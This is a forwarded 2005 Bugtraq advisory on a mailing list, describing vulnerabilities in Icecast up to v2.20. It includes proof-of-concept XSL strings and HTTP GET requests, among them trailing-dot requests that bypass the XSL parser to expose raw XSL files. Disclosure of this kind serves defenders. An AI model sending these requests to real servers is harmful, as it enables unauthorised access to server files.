[Icecast] [Fwd: IceCast up to v2.20 multiple vulnerabilities]

[Stauf]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey all,
did you happen to see this recent post to bugtraq?  If so, I apologize.
 I haven't been keeping up with the archives since everything has been
running so smoothly. ;)
- --Stauf

- -------- Original Message --------
Subject: IceCast up to v2.20 multiple vulnerabilities
Date: 18 Mar 2005 22:31:14 -0000
From: Patrick <patrickthomassen at gmail.com>
To: bugtraq at securityfocus.com



These are tested on IceCast v2.20. This software can be freely obtained
from http://www.icecast.org.

"Icecast is a streaming media server which currently supports Ogg
Vorbis and MP3 audio streams. It can be used to create an Internet
radio station or a privately running jukebox and many things in
between. It is very versatile in that new formats can be added
relatively easily and supports open standards for commuincation and
interaction."

1) The XSL parser has some unchecked buffers (local), but they dont seem
to be exploitable. If they are, they can be used for priviledge
escalation, under the user that the server runs.

<xsl:when test="<lots of chars>"></xsl:when>
<xsl:if test="<lots of chars>"></xsl:if>
<xsl:value-of select="<lots of chars>" />

2) Cause XSL parser error "Could not parse XSLT file". (Not very useful).

GET /status.xsl> HTTP/1.0
GET /status.xsl< HTTP/1.0
GET /<status.xsl HTTP/1.0

3) XSL parser bypass. (Useful to steal customized XSL files, lol).

GET /auth.xsl. HTTP/1.0
GET /status.xsl. HTTP/1.0

- --


| " Yesterday upon the stair I met a man who wasn't there.
|   He wasn't there again today. I wish that man would go away."
|                   <[Hughes Mearns]>
| Latest Public Key: http://www.freshcheese.net/~stauf/stauf.gpg
- -----------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFCO+Hbes/ougteP9sRAtgSAJ9nYFhudOMpVuyqZm0jNZRWlYgc+ACfQ7/G
mImqUQFEVENmvtgI1F/1ucg=
=MUwH
-----END PGP SIGNATURE-----